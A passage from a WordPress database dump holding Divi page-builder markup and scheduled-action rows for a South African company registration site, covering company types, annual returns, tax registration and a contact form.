custom_padding_tablet=\"|10vw||10vw||true\" custom_padding_last_edited=\"on|tablet\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.19.6\" text_font=\"||||||||\" text_line_height=\"2em\" header_font=\"Poppins|600|||||||\" header_font_size=\"40px\" header_line_height=\"1.3em\" header_2_font=\"Poppins|600|||||||\" header_2_font_size=\"32px\" header_2_line_height=\"1.6em\" max_width=\"700px\" header_2_font_size_tablet=\"24px\" header_2_font_size_phone=\"18px\" header_2_font_size_last_edited=\"on|phone\" locked=\"off\"]<h2>A Proven Process Time &amp; Time Again</h2>\n<p>Vivamus suscipit tortor eget felis porttitor volutpat. Vivamus suscipit tortor eget felis porttitor volutpat. Curabitur non nulla sit amet nisl tempus convallis quis ac lectus. Praesent sapien</p>[/et_pb_text][et_pb_button button_text=\"Online Project Application\" _builder_version=\"3.19.6\" custom_button=\"on\" button_text_size=\"12px\" button_text_color=\"#ffffff\" button_bg_color=\"#1ca5ff\" button_border_width=\"0px\" button_border_radius=\"100px\" button_letter_spacing=\"1px\" button_font=\"Poppins|600||on|||||\" button_icon=\"%%190%%\" button_on_hover=\"off\" box_shadow_style=\"preset3\" box_shadow_vertical=\"30px\" box_shadow_blur=\"40px\" box_shadow_spread=\"-16px\" box_shadow_color=\"rgba(28,165,255,0.24)\" custom_padding=\"14px|58px|14px|40px|true|false\" locked=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section]','Maintaining Your Company','','inherit','closed','closed','','32724-revision-v1','','','2019-08-15 14:55:41','2019-08-15 12:55:41','',32724,'https://companyregistration.online/32724-revision-v1/',0,'revision','',0),(32825,3,'2019-08-15 16:14:14','2019-08-15 14:14:14','[et_pb_section fb_built=\"1\" admin_label=\"Header\" _builder_version=\"3.22\" custom_width_px__hover=\"1080px\" custom_width_px__hover_enabled=\"1080px\" custom_width_percent__hover=\"80%\" custom_width_percent__hover_enabled=\"80%\" locked=\"off\" parallax_1__hover=\"off\" parallax_1__hover_enabled=\"off\" parallax_2__hover=\"off\" parallax_2__hover_enabled=\"off\" parallax_3__hover=\"off\" parallax_3__hover_enabled=\"off\" parallax_method_1__hover=\"on\" parallax_method_1__hover_enabled=\"on\" parallax_method_2__hover=\"on\" parallax_method_2__hover_enabled=\"on\" parallax_method_3__hover=\"on\" parallax_method_3__hover_enabled=\"on\" use_background_color_gradient__hover=\"off\" use_background_color_gradient__hover_enabled=\"off\" background_color_gradient_start__hover=\"#2b87da\" background_color_gradient_start__hover_enabled=\"#2b87da\" background_color_gradient_end__hover=\"#29c4a9\" background_color_gradient_end__hover_enabled=\"#29c4a9\" background_color_gradient_type__hover=\"linear\" background_color_gradient_type__hover_enabled=\"linear\" background_color_gradient_direction__hover=\"180deg\" background_color_gradient_direction__hover_enabled=\"180deg\" background_color_gradient_direction_radial__hover=\"center\" background_color_gradient_direction_radial__hover_enabled=\"center\" background_color_gradient_start_position__hover=\"0%\" background_color_gradient_start_position__hover_enabled=\"0%\" background_color_gradient_end_position__hover=\"100%\" background_color_gradient_end_position__hover_enabled=\"100%\" background_color_gradient_overlays_image__hover=\"off\" background_color_gradient_overlays_image__hover_enabled=\"off\" parallax__hover=\"off\" parallax__hover_enabled=\"off\" parallax_method__hover=\"on\" parallax_method__hover_enabled=\"on\" background_size__hover=\"cover\" background_size__hover_enabled=\"cover\" background_position__hover=\"center\" background_position__hover_enabled=\"center\" background_repeat__hover=\"no-repeat\" background_repeat__hover_enabled=\"no-repeat\" background_blend__hover=\"normal\" background_blend__hover_enabled=\"normal\" allow_player_pause__hover=\"off\" allow_player_pause__hover_enabled=\"off\" background_video_pause_outside_viewport__hover=\"on\" background_video_pause_outside_viewport__hover_enabled=\"on\" inner_shadow__hover=\"off\" inner_shadow__hover_enabled=\"off\" make_fullwidth__hover=\"off\" make_fullwidth__hover_enabled=\"off\" use_custom_width__hover=\"off\" use_custom_width__hover_enabled=\"off\" width_unit__hover=\"on\" width_unit__hover_enabled=\"on\" make_equal__hover=\"off\" make_equal__hover_enabled=\"off\" use_custom_gutter__hover=\"off\" use_custom_gutter__hover_enabled=\"off\" gutter_width__hover=\"3\" gutter_width__hover_enabled=\"3\" border_radii__hover=\"on||||\" border_radii__hover_enabled=\"on||||\" box_shadow_style__hover=\"none\" box_shadow_style__hover_enabled=\"none\" box_shadow_color__hover=\"rgba(0,0,0,0.3)\" box_shadow_color__hover_enabled=\"rgba(0,0,0,0.3)\" max_width__hover=\"100%\" max_width__hover_enabled=\"100%\" filter_hue_rotate__hover=\"0deg\" filter_hue_rotate__hover_enabled=\"0deg\" filter_saturate__hover=\"100%\" filter_saturate__hover_enabled=\"100%\" filter_brightness__hover=\"100%\" filter_brightness__hover_enabled=\"100%\" filter_contrast__hover=\"100%\" filter_contrast__hover_enabled=\"100%\" filter_invert__hover=\"0%\" filter_invert__hover_enabled=\"0%\" filter_sepia__hover=\"0%\" filter_sepia__hover_enabled=\"0%\" filter_opacity__hover=\"100%\" filter_opacity__hover_enabled=\"100%\" filter_blur__hover=\"0px\" filter_blur__hover_enabled=\"0px\" mix_blend_mode__hover=\"normal\" mix_blend_mode__hover_enabled=\"normal\" animation_style__hover=\"none\" animation_style__hover_enabled=\"none\" animation_repeat__hover=\"once\" animation_repeat__hover_enabled=\"once\" animation_direction__hover=\"center\" animation_direction__hover_enabled=\"center\" animation_duration__hover=\"1000ms\" animation_duration__hover_enabled=\"1000ms\" animation_delay__hover=\"0ms\" animation_delay__hover_enabled=\"0ms\" animation_intensity_slide__hover=\"50%\" animation_intensity_slide__hover_enabled=\"50%\" animation_intensity_zoom__hover=\"50%\" animation_intensity_zoom__hover_enabled=\"50%\" animation_intensity_flip__hover=\"50%\" animation_intensity_flip__hover_enabled=\"50%\" animation_intensity_fold__hover=\"50%\" animation_intensity_fold__hover_enabled=\"50%\" animation_intensity_roll__hover=\"50%\" animation_intensity_roll__hover_enabled=\"50%\" animation_starting_opacity__hover=\"0%\" animation_starting_opacity__hover_enabled=\"0%\" animation_speed_curve__hover=\"ease-in-out\" animation_speed_curve__hover_enabled=\"ease-in-out\" hover_transition_duration__hover=\"300ms\" hover_transition_duration__hover_enabled=\"300ms\" hover_transition_delay__hover=\"0ms\" hover_transition_delay__hover_enabled=\"0ms\" hover_transition_speed_curve__hover=\"ease\" hover_transition_speed_curve__hover_enabled=\"ease\"][et_pb_row _builder_version=\"3.25\" locked=\"off\"][et_pb_column type=\"4_4\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_divider color=\"#1ca5ff\" divider_weight=\"16px\" _builder_version=\"3.19.6\" max_width=\"48px\" locked=\"off\"][/et_pb_divider][et_pb_text _builder_version=\"3.19.6\" text_font=\"||||||||\" text_line_height=\"2em\" header_font=\"Poppins|600|||||||\" header_font_size=\"50px\" header_line_height=\"1.3em\" header_font_size_tablet=\"30px\" header_font_size_phone=\"24px\" header_font_size_last_edited=\"on|desktop\"]<h1>Register A Company</h1>[/et_pb_text][et_pb_text _builder_version=\"3.19.6\" text_font=\"||||||||\" text_font_size=\"18px\" text_line_height=\"2em\" header_font=\"Poppins|600|||||||\" header_font_size=\"40px\" header_line_height=\"1.3em\" text_font_size_tablet=\"16px\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" locked=\"off\"][/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"3.25\" custom_margin=\"|auto|50px|auto||\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2019/08/app-23.png\" align_tablet=\"center\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" specialty=\"on\" padding_top_1=\"200px\" padding_top_3=\"100px\" padding_1_tablet=\"0px||\" padding_3_tablet=\"0px||\" padding_1_last_edited=\"on|tablet\" padding_3_last_edited=\"on|desktop\" admin_label=\"About\" _builder_version=\"3.22\" custom_margin=\"||104px|||\"][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_tablet__hover=\"0px||\" padding_last_edited__hover=\"on|tablet\" padding_top__hover=\"200px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner _builder_version=\"3.25\" custom_padding=\"0px|||||\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.19.6\" text_font=\"||||||||\" text_line_height=\"2em\" header_font=\"Poppins|600|||||||\" header_font_size=\"40px\" header_line_height=\"1.3em\" header_2_font=\"Poppins|600|||||||\" header_2_font_size=\"32px\" header_2_line_height=\"1.6em\" max_width=\"700px\" module_alignment=\"center\" header_2_font_size_tablet=\"24px\" header_2_font_size_phone=\"18px\" header_2_font_size_last_edited=\"on|phone\" locked=\"off\"]<h2>What Company Type Do I Need ?</h2>[/et_pb_text][et_pb_text _builder_version=\"3.19.6\" text_font=\"||||||||\" text_line_height=\"2em\" header_font=\"Poppins|600|||||||\" header_font_size=\"40px\" header_line_height=\"1.3em\" text_font_size_tablet=\"14px\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"off|tablet\" locked=\"off\"]<p>Mauris blandit aliquet elit, eget tincidunt nibh pulvinar a. Vestibulum ante ipsum primis in faucibus orci luctus et ultrices posuere cubilia Curae; Donec velit neque, auctor sit amet aliquam vel, ullamcorper sit amet ligula. Curabitur arcu erat, accumsan id imperdiet et, porttitor at sem. Nulla quis lorem ut l</p>[/et_pb_text][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Private Company\" use_icon=\"on\" font_icon=\"%%144%%\" icon_color=\"#1ca5ff\" use_icon_font_size=\"on\" icon_font_size=\"50px\" _builder_version=\"3.26.6\" header_font=\"Poppins|600||on|||||\" header_font_size=\"16px\" header_letter_spacing=\"1px\" header_line_height=\"1.6em\" background_color=\"#ffffff\" border_radii=\"on|8px|8px|8px|8px\" box_shadow_style=\"preset1\" box_shadow_vertical=\"10px\" box_shadow_blur=\"60px\" box_shadow_color=\"rgba(39,39,52,0.06)\" text_orientation=\"center\" custom_padding=\"30px|20px|30px|20px|true|true\" locked=\"off\" link_option_url=\"https://companyregistration.online/shop/company-registration/private-company-with-a-standard-moi-basic/\" url=\"https://companyregistration.online/shop/company-registration/private-company-with-a-standard-moi-basic/\"][/et_pb_blurb][et_pb_blurb title=\"Private Company With Customized MOI\" use_icon=\"on\" font_icon=\"%%144%%\" icon_color=\"#1ca5ff\" use_icon_font_size=\"on\" icon_font_size=\"50px\" _builder_version=\"3.26.6\" header_font=\"Poppins|600||on|||||\" header_font_size=\"16px\" header_letter_spacing=\"1px\" header_line_height=\"1.6em\" background_color=\"#ffffff\" border_radii=\"on|8px|8px|8px|8px\" box_shadow_style=\"preset1\" box_shadow_vertical=\"10px\" box_shadow_blur=\"60px\" box_shadow_color=\"rgba(39,39,52,0.06)\" text_orientation=\"center\" custom_padding=\"30px|20px|30px|20px|true|true\" locked=\"off\" url=\"https://companyregistration.online/shop/company-registration/private-company-customised-moi-full/\" link_option_url=\"https://companyregistration.online/shop/company-registration/private-company-customised-moi-full/\"][/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_tablet__hover=\"0px||\" padding_last_edited__hover=\"on|desktop\" padding_top__hover=\"100px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Personal Liability Company\" use_icon=\"on\" font_icon=\"%%144%%\" icon_color=\"#1ca5ff\" use_icon_font_size=\"on\" icon_font_size=\"50px\" _builder_version=\"3.26.6\" header_font=\"Poppins|600||on|||||\" header_font_size=\"16px\" header_letter_spacing=\"1px\" header_line_height=\"1.6em\" background_color=\"#ffffff\" border_radii=\"on|8px|8px|8px|8px\" box_shadow_style=\"preset1\" box_shadow_vertical=\"10px\" box_shadow_blur=\"60px\" box_shadow_color=\"rgba(39,39,52,0.06)\" text_orientation=\"center\" custom_padding=\"30px|20px|30px|20px|true|true\" locked=\"off\" url=\"https://companyregistration.online/shop/company-registration/personal-liability-company/\" link_option_url=\"https://companyregistration.online/shop/company-registration/personal-liability-company/\"][/et_pb_blurb][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" custom_padding_last_edited=\"on|tablet\" admin_label=\"Call to Action\" _builder_version=\"3.26.6\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"#edf8ff\" width=\"93%\" module_alignment=\"center\" custom_padding=\"||\" custom_padding_tablet=\"|0vw|30vw|\" bottom_divider_color=\"#ffffff\" bottom_divider_height=\"24vw\" bottom_divider_repeat=\"0.6x\" bottom_divider_flip=\"vertical|horizontal\" bottom_divider_arrangement=\"above_content\" locked=\"off\"][et_pb_row column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" gutter_width=\"2\" _builder_version=\"3.25\" width=\"100%\" max_width=\"100%\" use_custom_width=\"on\" width_unit=\"off\" custom_width_percent=\"100%\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.26.6\" text_font=\"||||||||\" text_font_size=\"21px\" text_line_height=\"2em\" header_font=\"Poppins|600|||||||\" header_font_size=\"40px\" header_line_height=\"1.3em\" header_2_font=\"Poppins|600|||||||\" header_2_text_align=\"center\" header_2_font_size=\"32px\" header_2_line_height=\"1.6em\" max_width=\"700px\" header_2_font_size_tablet=\"24px\" header_2_font_size_phone=\"18px\" header_2_font_size_last_edited=\"on|phone\" locked=\"off\"]<h2>Not Exactly Sure What To Do?</h2>\n<p style=\"text-align: center;\">Fill our contact form and a consultant will get contact you to better discuss what services your company requires</p>[/et_pb_text][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2019/08/app-19.png\" show_bottom_space=\"off\" _builder_version=\"3.23\" max_width_tablet=\"400px\" max_width_last_edited=\"on|tablet\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"1%\" always_center_on_mobile=\"off\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|10vw||\" custom_padding_tablet=\"|10vw||10vw||true\" custom_padding_last_edited=\"on|tablet\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.26.6\"]<iframe frameborder=\"0\" style=\"height: 720px; width: 99%; border: none;\" src=\"https://forms.zohopublic.com/mawincnetwork/form/ContactForm/formperma/mgyNovoEJpAyVGAXfwsVHV_TgNG-DKU904Sz1B2Verw\"></iframe>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Company Registrations','','inherit','closed','closed','','32664-revision-v1','','','2019-08-15 16:14:14','2019-08-15 14:14:14','',32664,'https://companyregistration.online/32664-revision-v1/',0,'revision','',0),(32815,0,'2019-08-15 14:32:24','2019-08-15 14:32:24','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d5573ffb7ef37.10479199-5v6Z2regKTidXa9ANVRWx9ukNJEuPsU0','','','2019-08-15 17:02:23','2019-08-15 15:02:23','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=32815',0,'scheduled-action','',3),(32816,0,'2019-08-15 14:32:24','2019-08-15 14:32:24','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d5573ffe00c50.64228875-wvIB9FhI4B2xwE4gwYvtz6ZlnLaxyukG','','','2019-08-15 17:02:23','2019-08-15 15:02:23','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=32816',0,'scheduled-action','',3),(32819,3,'2019-08-15 15:40:57','2019-08-15 13:40:57','[et_pb_section fb_built=\"1\" inner_shadow=\"on\" _builder_version=\"3.26.3\" background_image=\"https://companyregistration.online/wp-content/uploads/2019/07/flag-waving-250.png\" background_size=\"contain\" background_repeat=\"repeat-y\" custom_padding=\"3px|0px|0px|0px\" top_divider_style=\"wave2\" top_divider_color=\"rgba(0,0,0,0)\" top_divider_height=\"46px\" top_divider_flip=\"horizontal\" animation_style=\"zoom\"][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Flags\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"3.26.3\" width=\"89%\" width_tablet=\"80%\" width_last_edited=\"on|desktop\" max_width=\"89%\" max_width_tablet=\"80%\" max_width_last_edited=\"on|desktop\" custom_margin=\"|||\" custom_padding=\"10px|0px|0px|0px\" make_fullwidth=\"on\" locked=\"off\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" background_position=\"top_left\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2019/07/flag-waving-250.png\" align_tablet=\"center\" align_last_edited=\"on|desktop\" _builder_version=\"3.26.3\" max_width=\"70px\" animation_style=\"bounce\" animation_direction=\"top\" animation_duration=\"2000ms\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" background_position=\"top_left\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2019/07/flag-waving-250.png\" align=\"right\" align_tablet=\"center\" align_last_edited=\"on|desktop\" disabled_on=\"on|on|off\" _builder_version=\"3.26.3\" max_width=\"70px\" animation_style=\"bounce\" animation_direction=\"top\" animation_duration=\"2500ms\" animation_delay=\"200ms\" animation_starting_opacity=\"8%\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"3.24\" background_color=\"#ffffff\" parallax=\"on\" custom_padding=\"20px|0px|1px|0px|false|false\"][et_pb_row module_class=\" et_pb_row_fullwidth\" _builder_version=\"3.25\" width=\"89%\" width_tablet=\"80%\" width_last_edited=\"on|desktop\" max_width=\"89%\" max_width_tablet=\"80%\" max_width_last_edited=\"on|desktop\" custom_padding=\"0px|0px|0px|0px\" make_fullwidth=\"on\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_tabs active_tab_background_color=\"#7cda24\" inactive_tab_background_color=\"#e8e8e8\" _builder_version=\"3.24\" tab_font=\"|700|||||||\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"rgba(0,0,0,0.16)\" background_color_gradient_direction=\"179deg\" background_color_gradient_start_position=\"37%\" border_radii=\"on|10px|10px|10px|10px\" box_shadow_style=\"preset2\" animation_style=\"fold\" animation_direction=\"bottom\" animation_duration=\"1200ms\" animation_delay=\"100ms\"][et_pb_tab title=\"One stop\" _builder_version=\"3.0.85\" tab_font=\"Abel|on|||\" tab_font_size=\"17px\"]<h3 style=\"text-align: center;\"><span style=\"font-family: Abel; font-weight: normal;\"><strong>All the registrations you require to get your company compliant and ready for business anywhere in <span style=\"font-size: x-large;\"><span style=\"color: #154907;\">S</span><span style=\"color: #e09900;\">o<span style=\"color: #184c0d;\">u</span><span style=\"color: #e02b20;\">t</span><span style=\"color: #0c71c3;\">h</span> <span style=\"color: #000000;\">A</span>f<span style=\"color: #195e10;\">r</span><span style=\"color: #e02b20;\">i</span><span style=\"color: #0c71c3;\">c</span><span style=\"color: #000000;\">a</span></span></span></strong></span></h3>\r[/et_pb_tab][et_pb_tab title=\"For Tenders\" _builder_version=\"3.2.1\" body_font=\"||||\" tab_font=\"Abel||||\" tab_font_size=\"17px\" inline_fonts=\"Abel\"]<h4><strong><span style=\"font-family: Abel;\">Get all the registrations documents<a href=\"https://companyregistration.online/shop/combo-deals/tender-ready/\" target=\"_blank\" rel=\"noopener noreferrer\" title=\"Tender Ready\"> <span style=\"color: #993366;\">for your tender</span> </a>fast tracked and professionally done so that no opportunity is missed.</span></strong></h4>[/et_pb_tab][et_pb_tab title=\"Secure Payment Gateway\" _builder_version=\"3.24\" tab_font=\"Abel|on|||\" tab_font_size=\"17px\" inline_fonts=\"Abel\"]<h4 style=\"text-align: center;\"><strong><span style=\"font-family: Abel;\">We use a trusted South African payment gateway. No credit card information is maintained on our site. The payment gateway is a member of the Payments Association of South Africa (PASA)?</span></strong></h4>[/et_pb_tab][et_pb_tab title=\"Simple process\" _builder_version=\"3.24\" body_font=\"||||||||\" tab_font=\"Abel|on|||\" tab_font_size=\"17px\" inline_fonts=\"Abel\"]<h4 style=\"text-align: center;\"><strong><span style=\"font-family: Abel;\">Purchase the service, complete the form, if applicable, submit supporting documentation and RELAX, you done, all from your arm chair.</span></strong></h4>\n<p style=\"text-align: center;\"><span style=\"color: #333399;\"><strong><span style=\"font-family: Abel;\">PROFESSIONAL,SIMPLE &amp; CONVENIENT</span></strong></span></p>[/et_pb_tab][et_pb_tab title=\"Professional Service\" _builder_version=\"3.2.1\" tab_font=\"Abel|on|||\" tab_font_size=\"17px\" inline_fonts=\"Abel\"]<h4 style=\"text-align: center;\"><span style=\"font-family: Abel; font-weight: normal;\"><strong>We advise you on the appropriate company to register and keep you informed all the way until the work process is complete or registered . We will also facilitate the opening of the business bank account anywhere in South Africa<br /> </strong></span></h4>[/et_pb_tab][et_pb_tab title=\"Visit Blog/FAQs \" _builder_version=\"3.0.85\" tab_font=\"Abel|on|||\" tab_font_size=\"17px\" inline_fonts=\"Abel\"]<h4 style=\"text-align: center;\"><strong><span style=\"font-family: Abel;\"><span style=\"color: #0c71c3;\"><a href=\"https://companyregistration.online/category/faqs/\" style=\"color: #0c71c3;\">Valuable information</a></span> about the right company to register, consequences of deregistration, difference between CIPC Annual Return and AnnualTax Return, etc</span></strong></h4>[/et_pb_tab][/et_pb_tabs][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"3.26.6\"][et_pb_row column_structure=\"1_2,1_2\" _builder_version=\"3.26.6\"][et_pb_column type=\"1_2\" _builder_version=\"3.26.6\"][et_pb_divider show_divider=\"off\" _builder_version=\"3.26.6\" height=\"125px\"][/et_pb_divider][et_pb_text _builder_version=\"3.26.6\" text_font=\"|700|||||||\" header_font=\"|700|||||||\" header_text_align=\"center\" header_font_size=\"47px\"]<h1 style=\"text-align: center;\">What Would You Like To Do ?</h1>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.26.6\"][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2019/07/working-free-img.jpg\" _builder_version=\"3.26.6\"][/et_pb_image][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" _builder_version=\"3.26.6\" width=\"98%\" max_width=\"1347px\" module_alignment=\"center\" custom_margin=\"|223px||427px||\"][et_pb_column type=\"1_4\" _builder_version=\"3.26.6\"][et_pb_cta title=\"Register A Company\" button_text=\"Start here\" admin_label=\"owner managed\" _builder_version=\"3.26.6\" header_font=\"Abel|on|||\" header_text_color=\"#0c71c3\" header_letter_spacing=\"2px\" background_color_gradient_direction=\"177deg\" background_blend=\"overlay\" border_radii=\"on|10px|10px|10px|10px\" border_width_all=\"0px\" border_color_all=\"#ffffff\" border_style_all=\"solid\" custom_button=\"on\" button_text_size=\"15px\" button_border_width=\"0px\" background_layout=\"light\" custom_margin=\"0px||||false|false\" custom_padding=\"20px|5px|4px|5px|false|false\" animation_style=\"flip\" animation_delay=\"400ms\" link_option_url=\"https://companyregistration.online/company-registrations/\" custom_css_main_element=\"box-shadow: 0px 0px 20px #bfb7b6;\" use_border_color=\"on\" border_width=\"0px\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\" background__hover_enabled=\"on\" background_enable_color=\"off\" background_color__hover=\"rgba(196,13,126,0.64)\" background_enable_color__hover=\"on\" header_text_color__hover_enabled=\"on\" header_text_color__hover=\"#ffffff\"][/et_pb_cta][et_pb_toggle title=\"View More\" _builder_version=\"3.26.6\" custom_margin=\"-41px||||false|false\"]<p><strong>What type of companies that can be registered</strong><span> </span>in terms of the New Companies Act 71, 2008</p>\n<ul>\n<li>Private company (Pty) Ltd</li>\n<li>Public company (Ltd)</li>\n<li>State-owned company (SOC)</li>\n<li>External company</li>\n<li>Personal liability company (Inc)</li>\n<li>Non-profit company (NPC)</li>\n</ul>[/et_pb_toggle][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.26.6\"][et_pb_cta title=\"Maintain My Company\" button_text=\"Start here\" admin_label=\"owner managed\" _builder_version=\"3.26.6\" header_font=\"Abel|on|||\" header_text_color=\"#0c71c3\" border_radii=\"on|10px|10px|10px|10px\" border_width_all=\"0px\" border_color_all=\"#ffffff\" border_style_all=\"solid\" custom_button=\"on\" button_text_size=\"15px\" button_border_width=\"0px\" background_layout=\"light\" custom_margin=\"0px||||false|false\" custom_padding=\"20px|5px|4px|5px|false|false\" animation_style=\"flip\" animation_delay=\"400ms\" link_option_url=\"https://companyregistration.online/maintaining-your-company/\" custom_css_main_element=\"box-shadow: 0px 0px 20px #bfb7b6;\" use_border_color=\"on\" border_width=\"0px\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\" header_letter_spacing=\"2px\" header_text_color__hover=\"#ffffff\" header_text_color__hover_enabled=\"on\" background_color_gradient_direction=\"177deg\" background_blend=\"overlay\" background_color__hover=\"rgba(196,13,126,0.64)\" background_enable_color=\"off\" background_enable_color__hover=\"on\" background__hover_enabled=\"on\"][/et_pb_cta][et_pb_toggle title=\"View More\" _builder_version=\"3.26.6\" custom_margin=\"-41px||||false|false\"]<p><span>All companies (including external companies) and close corporations are required by law to file their annual returns with the CIPC on an annual basis, within a prescribed time period. The purpose for the filing of such annual returns is to confirm whether a company or close corporation is still in business/trading, or if it will be in business in the near future.</span></p>[/et_pb_toggle][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.26.6\"][et_pb_cta title=\"Register For Tax\" button_text=\"Start here\" admin_label=\"owner managed\" _builder_version=\"3.26.6\" header_font=\"Abel|on|||\" header_text_color=\"#0c71c3\" border_radii=\"on|10px|10px|10px|10px\" border_width_all=\"0px\" border_color_all=\"#ffffff\" border_style_all=\"solid\" custom_button=\"on\" button_text_size=\"15px\" button_border_width=\"0px\" background_layout=\"light\" custom_margin=\"0px||||false|false\" custom_padding=\"20px|5px|4px|5px|false|false\" animation_style=\"flip\" animation_delay=\"400ms\" link_option_url=\"https://companyregistration.online/tax-registrations\" custom_css_main_element=\"box-shadow: 0px 0px 20px #bfb7b6;\" use_border_color=\"on\" border_width=\"0px\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\" header_letter_spacing=\"2px\" header_text_color__hover=\"#ffffff\" header_text_color__hover_enabled=\"on\" background_color_gradient_direction=\"177deg\" background_blend=\"overlay\" background_color__hover=\"rgba(196,13,126,0.64)\" background_enable_color=\"off\" background_enable_color__hover=\"on\" background__hover_enabled=\"on\"][/et_pb_cta][et_pb_toggle title=\"View More\" _builder_version=\"3.26.6\" custom_margin=\"-41px||||false|false\"]<p>Any person that carries on a business may register for VAT. The term person is not only limited to companies but also includes, 